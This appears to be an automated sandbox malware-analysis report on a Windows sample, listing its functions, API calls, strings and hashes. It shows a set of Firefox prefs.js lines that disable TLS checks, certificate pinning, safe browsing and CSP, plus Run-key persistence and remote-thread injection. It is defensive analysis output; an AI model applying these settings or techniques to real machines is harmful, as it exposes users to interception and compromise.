Instruction Fuzzy Hash: 09318D6661AA81E1DB618F15E8502BA77A1FF48BC4F50417ACE8C83768DF3CD95AC740

Function 00007FF68A18831C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46networkCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32 ref: 00007FF68A18833F
InternetOpenW.WININET ref: 00007FF68A18837C
SHGetFolderPathW.SHELL32 ref: 00007FF68A1883B1

Strings

SystemUpdate.exe, xrefs: 00007FF68A188350
Mozilla 5/0, xrefs: 00007FF68A188372

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Path$FolderInternetOpenTemp
String ID: Mozilla 5/0$SystemUpdate.exe
API String ID: 3028979721-1667272149
Opcode ID: aa8486e344bf38601dbf74f5ef09ddfd5e1d0c110bc31d4634bda436f9f0463d
Instruction ID: 5d507d39e3b5c2af08d6520c39d67b53dddc409be288c8c0677d83166c54cd2a
Opcode Fuzzy Hash: aa8486e344bf38601dbf74f5ef09ddfd5e1d0c110bc31d4634bda436f9f0463d
Instruction Fuzzy Hash: 7C115172B1A642E2FA609B10E4547BA6791FF99748F805079DECE86A85EF3CE108C704

Function 00007FF68A182AD0 Relevance: 3.0, APIs: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32 ref: 00007FF68A182B08
RegCloseKey.ADVAPI32 ref: 00007FF68A182B18

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: CloseValue
String ID:
API String ID: 3132538880-0
Opcode ID: 76445e9cbc6cd9ab1f6cbcf7a2f2c6e46b211274f6edb25bae53a7d05003b39e
Instruction ID: 2fe1e73f133900c8d117a5657fa8151986ed586054de61508bb5d4032aa64d7a
Opcode Fuzzy Hash: 76445e9cbc6cd9ab1f6cbcf7a2f2c6e46b211274f6edb25bae53a7d05003b39e
Instruction Fuzzy Hash: 79F0A72AB1552096E7619F28AA4467A6770BF587F1F041735DEBE837E0DF2C9486C700

Non-executed Functions

Function 00007FF68A185AC0 Relevance: 116.7, APIs: 9, Strings: 57, Instructions: 1218processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68A185B05
Process32FirstW.KERNEL32 ref: 00007FF68A185B2A
OpenProcess.KERNEL32 ref: 00007FF68A185B50
TerminateProcess.KERNEL32 ref: 00007FF68A185B63
CloseHandle.KERNEL32 ref: 00007FF68A185B6C
Process32NextW.KERNEL32 ref: 00007FF68A185B7A
CloseHandle.KERNEL32 ref: 00007FF68A185B87

Part of subcall function 00007FF68A1812FC: _CxxThrowException.LIBCMT ref: 00007FF68A1813A7
Part of subcall function 00007FF68A1812FC: std::exception::exception.LIBCMT ref: 00007FF68A1813C0

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF68A186FE3

Part of subcall function 00007FF68A19C9B4: std::ios_base::_Tidy.LIBCPMT ref: 00007FF68A19C9D9

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF68A1872C1

Strings

user_pref("dom.security.https_only_mode", false);, xrefs: 00007FF68A186C03
user_pref("network.auth.non-web-content-triggered-resources-http-auth-allow", true);, xrefs: 00007FF68A18614D
user_pref("network.http.spdy.enabled", false);, xrefs: 00007FF68A186D4F
user_pref("browser.tabs.remote.autostart", false);, xrefs: 00007FF68A186D80
user_pref("security.tls.version.min", 1);, xrefs: 00007FF68A186752
user_pref("security.xss_detection.main_thread_script_filter", false);, xrefs: 00007FF68A18623B
user_pref("network.http.http4.enable", false);, xrefs: 00007FF68A185E86
user_pref("network.stricttransportsecurity.preloadlist", false);, xrefs: 00007FF68A186E41
user_pref("security.tls.version.max", 4);, xrefs: 00007FF68A1867C6
user_pref("privacy.firstparty.isolate", false);, xrefs: 00007FF68A1864FF
user_pref("network.http.enforce-framing.strict_chunked_encoding", false);, xrefs: 00007FF68A185FEB
user_pref("network.trr.send_empty_accept-encoding_headers", true);, xrefs: 00007FF68A1860D6
user_pref("security.cert_pinning.enforcement_level", 0);, xrefs: 00007FF68A1869E1
user_pref("network.http.http2.enabled", false);, xrefs: 00007FF68A185D1D
user_pref("browser.tabs.remote.autostart.2", false);, xrefs: 00007FF68A186DB1
user_pref("gfx.direct2d.disabled", true);, xrefs: 00007FF68A186DE2
browser.tabs.remote.autostart.2, xrefs: 00007FF68A186D99
user_pref("network.http.response.timeout", -1);, xrefs: 00007FF68A18605F
user_pref("browser.safebrowsing.downloads.remote.url", "");, xrefs: 00007FF68A186A3C
user_pref("network.http.altsvc.enabled", false);, xrefs: 00007FF68A186E54
user_pref("browser.safebrowsing.phishing.enabled", false);, xrefs: 00007FF68A186AF2
\prefs.js, xrefs: 00007FF68A185B9A
layers.acceleration.disabled, xrefs: 00007FF68A186DF8
network.http.spdy.enabled.v3, xrefs: 00007FF68A186D06
user_pref("security.tls.version.fallback-limit", 4);, xrefs: 00007FF68A18683D
user_pref("browser.safebrowsing.malware.enabled", false);, xrefs: 00007FF68A186A97
user_pref("security.fileuri.origin_policy", 0);, xrefs: 00007FF68A186414
user_pref("security.tls.insecure_fallback_hosts.use_static_list", false);, xrefs: 00007FF68A1866D8
browser.tabs.remote.autostart, xrefs: 00007FF68A186D68
user_pref("network.http.spdy.enabled.v3", false);, xrefs: 00007FF68A186D1E
user_pref("security.fileuri.strict_origin_policy", false);, xrefs: 00007FF68A1863A0
user_pref("security.sri.enable", false);, xrefs: 00007FF68A18648B
user_pref("network.http.version", 1);, xrefs: 00007FF68A185E12
user_pref("browser.safebrowsing.downloads.remote.enabled", false);, xrefs: 00007FF68A186661
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.http2", false);user_pref("network.http.spdy.e, xrefs: 00007FF68A186EAF
network.http.spdy.enabled, xrefs: 00007FF68A186D37
user_pref("security.mixed_content.block_object_subrequest", false);, xrefs: 00007FF68A186329
user_pref("security.enterprise_roots.enabled", true);user_pref("security.ssl.errorReporting.enabled", false);user_pref("security, xrefs: 00007FF68A186C5E
user_pref("security.csp.enable", false);, xrefs: 00007FF68A1861C4
user_pref("network.http.spdy.enabled.v3-1", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy, xrefs: 00007FF68A186CB9
user_pref("network.trr.no_warn_on_network_change", true);, xrefs: 00007FF68A185EFD
user_pref("security.OCSP.require", false);, xrefs: 00007FF68A186986
user_pref("network.http.http3.enable", false);, xrefs: 00007FF68A185D9B
gfx.direct2d.disabled, xrefs: 00007FF68A186DCA
user_pref("network.http.max_response_headers_kb", -1);, xrefs: 00007FF68A185F74
user_pref("network.http.spdy.enabled.v3-1", false);, xrefs: 00007FF68A186CEB
user_pref("browser.ssl_override_behavior", 1);, xrefs: 00007FF68A1865EA
user_pref("privacy.trackingprotection.enabled", false);, xrefs: 00007FF68A186B4D
user_pref("layers.acceleration.disabled", true);, xrefs: 00007FF68A186E10
network.stricttransportsecurity.preloadlist, xrefs: 00007FF68A186E29
network.http.spdy.enabled.v3-1, xrefs: 00007FF68A186CD3
firefox.exe, xrefs: 00007FF68A185B32
user_pref("privacy.donottrackheader.enabled", false);, xrefs: 00007FF68A186BA8
user_pref("security.tls.insecure_alerts", false);, xrefs: 00007FF68A1868B4
user_pref("security.mixed_content.block_display_content", false);, xrefs: 00007FF68A1862B2
user_pref("security.ssl.enable_ocsp_stapling", false);, xrefs: 00007FF68A18692B
user_pref("browser.xul.error_pages.expert_bad_cert", true);, xrefs: 00007FF68A186576

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: std::ios_base::_$CloseHandleIos_base_dtorProcessProcess32$CreateExceptionFirstNextOpenSnapshotTerminateThrowTidyToolhelp32std::exception::exception
String ID: \prefs.js$browser.tabs.remote.autostart$browser.tabs.remote.autostart.2$firefox.exe$gfx.direct2d.disabled$layers.acceleration.disabled$network.http.spdy.enabled$network.http.spdy.enabled.v3$network.http.spdy.enabled.v3-1$network.stricttransportsecurity.preloadlist$user_pref("browser.safebrowsing.downloads.remote.enabled", false);$user_pref("browser.safebrowsing.downloads.remote.url", "");$user_pref("browser.safebrowsing.malware.enabled", false);$user_pref("browser.safebrowsing.phishing.enabled", false);$user_pref("browser.ssl_override_behavior", 1);$user_pref("browser.tabs.remote.autostart", false);$user_pref("browser.tabs.remote.autostart.2", false);$user_pref("browser.xul.error_pages.expert_bad_cert", true);$user_pref("dom.security.https_only_mode", false);$user_pref("gfx.direct2d.disabled", true);$user_pref("layers.acceleration.disabled", true);$user_pref("network.auth.non-web-content-triggered-resources-http-auth-allow", true);$user_pref("network.http.altsvc.enabled", false);$user_pref("network.http.enforce-framing.strict_chunked_encoding", false);$user_pref("network.http.http2.enabled", false);$user_pref("network.http.http3.enable", false);$user_pref("network.http.http4.enable", false);$user_pref("network.http.max_response_headers_kb", -1);$user_pref("network.http.response.timeout", -1);$user_pref("network.http.spdy.enabled", false);$user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.http2", false);user_pref("network.http.spdy.e$user_pref("network.http.spdy.enabled.v3", false);$user_pref("network.http.spdy.enabled.v3-1", false);$user_pref("network.http.spdy.enabled.v3-1", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy$user_pref("network.http.version", 1);$user_pref("network.stricttransportsecurity.preloadlist", false);$user_pref("network.trr.no_warn_on_network_change", true);$user_pref("network.trr.send_empty_accept-encoding_headers", true);$user_pref("privacy.donottrackheader.enabled", false);$user_pref("privacy.firstparty.isolate", false);$user_pref("privacy.trackingprotection.enabled", false);$user_pref("security.OCSP.require", false);$user_pref("security.cert_pinning.enforcement_level", 0);$user_pref("security.csp.enable", false);$user_pref("security.enterprise_roots.enabled", true);user_pref("security.ssl.errorReporting.enabled", false);user_pref("security$user_pref("security.fileuri.origin_policy", 0);$user_pref("security.fileuri.strict_origin_policy", false);$user_pref("security.mixed_content.block_display_content", false);$user_pref("security.mixed_content.block_object_subrequest", false);$user_pref("security.sri.enable", false);$user_pref("security.ssl.enable_ocsp_stapling", false);$user_pref("security.tls.insecure_alerts", false);$user_pref("security.tls.insecure_fallback_hosts.use_static_list", false);$user_pref("security.tls.version.fallback-limit", 4);$user_pref("security.tls.version.max", 4);$user_pref("security.tls.version.min", 1);$user_pref("security.xss_detection.main_thread_script_filter", false);
API String ID: 1031472439-2660148757
Opcode ID: 3ed3324dc988d84eba29ecc3c0b0898e6ce25bc4d203d90b0b2130766b496fad
Instruction ID: 3647af6c15ef7b85e5cd5d4b5077901b3a8b2dc400677f3e91b8f4899b22754c
Opcode Fuzzy Hash: 3ed3324dc988d84eba29ecc3c0b0898e6ce25bc4d203d90b0b2130766b496fad
Instruction Fuzzy Hash: A6D24E62656AC6E9EB30DF24CC906EC2761FF55388F805036DA8D9B999EF39D709C340

Function 00007FF68A1883E8 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 171registrysleepnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68A187530: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68A18755C

Part of subcall function 00007FF68A187530: Process32FirstW.KERNEL32 ref: 00007FF68A18757F
Part of subcall function 00007FF68A187530: Process32NextW.KERNEL32 ref: 00007FF68A1875A6
Part of subcall function 00007FF68A187530: CloseHandle.KERNEL32 ref: 00007FF68A1875B7

RtlAdjustPrivilege.NTDLL ref: 00007FF68A188443
NtSetInformationProcess.NTDLL ref: 00007FF68A18845D
RtlAdjustPrivilege.NTDLL ref: 00007FF68A188476
NtSetInformationProcess.NTDLL ref: 00007FF68A18849A
RegOpenKeyExA.ADVAPI32 ref: 00007FF68A1884FB
RegSetValueExA.ADVAPI32 ref: 00007FF68A188534
RegCloseKey.ADVAPI32 ref: 00007FF68A18853F
Sleep.KERNEL32 ref: 00007FF68A1885F6
Sleep.KERNEL32 ref: 00007FF68A188673

Strings

firefox.exe, xrefs: 00007FF68A188557, 00007FF68A1885B9
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF68A1884DF
firefox.exe, xrefs: 00007FF68A188579
Taskmgr.exe, xrefs: 00007FF68A188412
chrome.exe, xrefs: 00007FF68A1885CF, 00007FF68A18863B
msedge.exe, xrefs: 00007FF68A188679
chrome.exe, xrefs: 00007FF68A1885FC
msedge.exe, xrefs: 00007FF68A188651, 00007FF68A1886B8
ProcessHacker.exe, xrefs: 00007FF68A18841E

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: AdjustCloseInformationPrivilegeProcessProcess32Sleep$CreateFirstHandleNextOpenSnapshotToolhelp32Value
String ID: ProcessHacker.exe$Software\Microsoft\Windows\CurrentVersion\Run$Taskmgr.exe$chrome.exe$chrome.exe$firefox.exe$firefox.exe$msedge.exe$msedge.exe
API String ID: 3550313185-4193319559
Opcode ID: 34b4021d4c87d332943d79067152d8067720cf9077b2f7bb1919dcdc7d4f019f
Instruction ID: ca3032e7961f662f86952b18c6839818100e5df8d74ecc5e9c921c121c159f79
Opcode Fuzzy Hash: 34b4021d4c87d332943d79067152d8067720cf9077b2f7bb1919dcdc7d4f019f
Instruction Fuzzy Hash: 6B919531A1D682E6EB10DB20E5506AA7F61FF81784F8401B9EDDD83AA5DF3DE509CB00

Function 00007FF68A19F100 Relevance: 25.7, APIs: 17, Instructions: 172COMMONLIBRARYCODE

Download Yara Rule

APIs

_Wcsftime.LIBCMT ref: 00007FF68A19F146

Part of subcall function 00007FF68A19FE24: _mbstowcs_s_l.LIBCMT ref: 00007FF68A19FE38

_calloc_crt.LIBCMT ref: 00007FF68A19F15E

Part of subcall function 00007FF68A18F6C0: _calloc_impl.LIBCMT ref: 00007FF68A18F6EE
Part of subcall function 00007FF68A18F6C0: Sleep.KERNEL32(?,?,?,00007FF68A191FBE,?,?,?,00007FF68A190911,?,?,?,?,00007FF68A18C9ED), ref: 00007FF68A18F705

_Wcsftime.LIBCMT ref: 00007FF68A19F185
free.LIBCMT ref: 00007FF68A19F19B
_invoke_watson.LIBCMT ref: 00007FF68A19F1B1

Part of subcall function 00007FF68A18FBA4: _call_reportfault.LIBCMT ref: 00007FF68A18FBCC
Part of subcall function 00007FF68A18FBA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00007FF68A18EA54), ref: 00007FF68A1959E8

_invoke_watson.LIBCMT ref: 00007FF68A19F1C6
_wsetlocale.LIBCMT ref: 00007FF68A19F1D2
free.LIBCMT ref: 00007FF68A19F1DD
_getptd.LIBCMT ref: 00007FF68A19F1E7
_wcstombs_s_l.LIBCMT ref: 00007FF68A19F228
_malloc_crt.LIBCMT ref: 00007FF68A19F250
_wcstombs_s_l.LIBCMT ref: 00007FF68A19F282
_lock.LIBCMT ref: 00007FF68A19F2AF
free.LIBCMT ref: 00007FF68A19F2D6
free.LIBCMT ref: 00007FF68A19F308
_invoke_watson.LIBCMT ref: 00007FF68A19F33A
_invoke_watson.LIBCMT ref: 00007FF68A19F34F

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: _invoke_watsonfree$Wcsftime_wcstombs_s_l$CurrentProcessSleep_call_reportfault_calloc_crt_calloc_impl_getptd_lock_malloc_crt_mbstowcs_s_l_wsetlocale
String ID:
API String ID: 2618247045-0
Opcode ID: 99458977b64c940a5e9949b1fc814d56461b629e867f3d912420e1e6e2ddbe44
Instruction ID: 57f1aa5e6d6c41fe5e40d994b8e6b6e23fc75d0c28e77764002c2f3251f79455
Opcode Fuzzy Hash: 99458977b64c940a5e9949b1fc814d56461b629e867f3d912420e1e6e2ddbe44
Instruction Fuzzy Hash: 03610632A2A742E2F7288B25965067A7A91BF84794F584679EEDEC3BD5CF7CD000C600

Function 00007FF68A190CD0 Relevance: 21.1, APIs: 14, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

__crtGetLocaleInfoA.LIBCMT ref: 00007FF68A190D29

Part of subcall function 00007FF68A196F50: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00007FF68A196F70
Part of subcall function 00007FF68A196F50: __crtGetLocaleInfoA_stat.LIBCMT ref: 00007FF68A196F8E

GetLastError.KERNEL32 ref: 00007FF68A190D35
__crtGetLocaleInfoA.LIBCMT ref: 00007FF68A190D51
__crtGetLocaleInfoA.LIBCMT ref: 00007FF68A190D88
_calloc_crt.LIBCMT ref: 00007FF68A190D64

Part of subcall function 00007FF68A18F6C0: _calloc_impl.LIBCMT ref: 00007FF68A18F6EE
Part of subcall function 00007FF68A18F6C0: Sleep.KERNEL32(?,?,?,00007FF68A191FBE,?,?,?,00007FF68A190911,?,?,?,?,00007FF68A18C9ED), ref: 00007FF68A18F705

_calloc_crt.LIBCMT ref: 00007FF68A190D9F
free.LIBCMT ref: 00007FF68A190DB7
free.LIBCMT ref: 00007FF68A190E03
GetLocaleInfoEx.KERNEL32 ref: 00007FF68A190E26
_calloc_crt.LIBCMT ref: 00007FF68A190E38
GetLocaleInfoEx.KERNEL32 ref: 00007FF68A190E50
free.LIBCMT ref: 00007FF68A190E5C
GetLocaleInfoEx.KERNEL32 ref: 00007FF68A190E87
_invoke_watson.LIBCMT ref: 00007FF68A190EAF

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl_invoke_watson
String ID:
API String ID: 411824461-0
Opcode ID: f48a9d2d8b30ce870815513dc9c1c6bbe85c3dab931c00d49a8746bc3a8b3a5c
Instruction ID: b27de57119043392cfe2accc377cf4ad3754e9df1853bc73b539acd802eddbac
Opcode Fuzzy Hash: f48a9d2d8b30ce870815513dc9c1c6bbe85c3dab931c00d49a8746bc3a8b3a5c
Instruction Fuzzy Hash: 1251F522F1A642E1FB609A22A6117BA1AD17F84FC4F88557DDD9DDBB86DE3CE400C640

Function 00007FF68A1820C0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 201synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68A181FD0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68A182023

GetCurrentProcess.KERNEL32 ref: 00007FF68A182273
OpenProcessToken.ADVAPI32 ref: 00007FF68A182284
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF68A1822A6
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF68A1822C9
CloseHandle.KERNEL32 ref: 00007FF68A1822D3
OpenProcess.KERNEL32 ref: 00007FF68A1822E3
WaitForSingleObject.KERNEL32 ref: 00007FF68A182310
CloseHandle.KERNEL32 ref: 00007FF68A182319

Strings

SeDebugPrivilege, xrefs: 00007FF68A18229D

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCreateCurrentLookupObjectPrivilegePrivilegesSingleSnapshotToolhelp32ValueWait
String ID: SeDebugPrivilege
API String ID: 380803426-2896544425
Opcode ID: 1ea432eeae664be0e19b7b2aaa70897d00c3826b4a7224168c486326e0c1472a
Instruction ID: eb796d5adb2c13214eb1c66bc12577fd999d9c6fca26066473aecc743c663e18
Opcode Fuzzy Hash: 1ea432eeae664be0e19b7b2aaa70897d00c3826b4a7224168c486326e0c1472a
Instruction Fuzzy Hash: 92819022B4AA42E5FB51CB71D8103AD3BA2BF45BA8F404679CEAD977D9CE38D145C340

Function 00007FF68A184F64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF68A184FC3
FindFirstFileW.KERNEL32 ref: 00007FF68A1850A9
FindNextFileW.KERNEL32 ref: 00007FF68A185191

Strings

\Mozilla\Firefox\Profiles\, xrefs: 00007FF68A18501E
release, xrefs: 00007FF68A18513A

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: FileFind$FirstFolderNextPath
String ID: \Mozilla\Firefox\Profiles\$release
API String ID: 2825019445-1178070541
Opcode ID: 27033247f02ea954e8275b56671a67b10e467c466793a94af67419d15f0e5e72
Instruction ID: 67c2de3744d1a4dd677b3cf2c1c834de8bf1631b599ff35462ef375fd3be5ac0
Opcode Fuzzy Hash: 27033247f02ea954e8275b56671a67b10e467c466793a94af67419d15f0e5e72
Instruction Fuzzy Hash: 3B91BE32A1AB42E6EB10CF64D8800AD3BB5FF40798F405179DE9DA7AA9DF38E155C740

Function 00007FF68A183084 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80injectionmemorythreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 00007FF68A1830FA
WriteProcessMemory.KERNEL32 ref: 00007FF68A18311D
VirtualProtectEx.KERNEL32 ref: 00007FF68A18313E
CreateRemoteThread.KERNEL32 ref: 00007FF68A18316A

Strings

@, xrefs: 00007FF68A1830E4

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
String ID: @
API String ID: 1113946311-2766056989
Opcode ID: 9990b832d10dddb3be58a87393efd9fc684c304d26788c0b604a58e1d2f95735
Instruction ID: d806ca5ac8e71203fe790487259c3e5b952d0eac560195cbb1d626af62bd8e45
Opcode Fuzzy Hash: 9990b832d10dddb3be58a87393efd9fc684c304d26788c0b604a58e1d2f95735
Instruction Fuzzy Hash: 3121BB2170A642A6EB258F12A94163ABEA1BF4CFC4F48413CDE8D93B58DF3CD005CB00

Function 00007FF68A187530 Relevance: 6.0, APIs: 4, Instructions: 48processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68A18755C
Process32FirstW.KERNEL32 ref: 00007FF68A18757F
Process32NextW.KERNEL32 ref: 00007FF68A1875A6
CloseHandle.KERNEL32 ref: 00007FF68A1875B7

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 1e454a4bd982196a97192b098099581b8af041b991a4dc92c4bc31d3252acf6c
Instruction ID: 55a68ebe945f74bd2d668695937a4953ea4ed33a830a5c423ff29a3bd2e7eabc
Opcode Fuzzy Hash: 1e454a4bd982196a97192b098099581b8af041b991a4dc92c4bc31d3252acf6c
Instruction Fuzzy Hash: C9116321A4D642E2EB20CB11E45437A6BA1BF48B94F5042B9DDED83B94DF3CE50ACA00

Function 00007FF68A1829C8 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF68A1829F7
SHGetFolderPathW.SHELL32 ref: 00007FF68A182A23
SHGetFolderPathW.SHELL32 ref: 00007FF68A182A43

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: FolderPath$FileModuleName
String ID:
API String ID: 906376703-0
